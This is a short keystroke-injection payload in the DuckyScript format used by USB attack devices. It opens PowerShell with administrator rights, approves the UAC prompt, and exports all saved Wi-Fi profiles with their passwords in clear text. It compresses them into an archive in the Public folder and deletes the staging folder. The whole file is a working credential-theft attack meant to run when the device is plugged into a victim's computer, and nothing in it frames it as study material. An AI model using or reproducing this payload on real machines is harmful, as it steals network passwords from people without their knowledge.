GUI r
STRING powershell
CTRL SHIFT ENTER
DELAY 1000
ALT y
DELAY 300
STRING $folder="C:\Users\Public\profiles"
ENTER
DELAY 300
STRING new-item -path $folder -itemtype directory -force
ENTER
DELAY 300
STRING netsh wlan export profile key=clear folder=$folder
ENTER
DELAY 300
STRING compress-archive $folder $folder -force
ENTER
DELAY 300
STRING remove-item $folder
ENTER
DELAY 1000
ENTER
STRING exit
ENTER
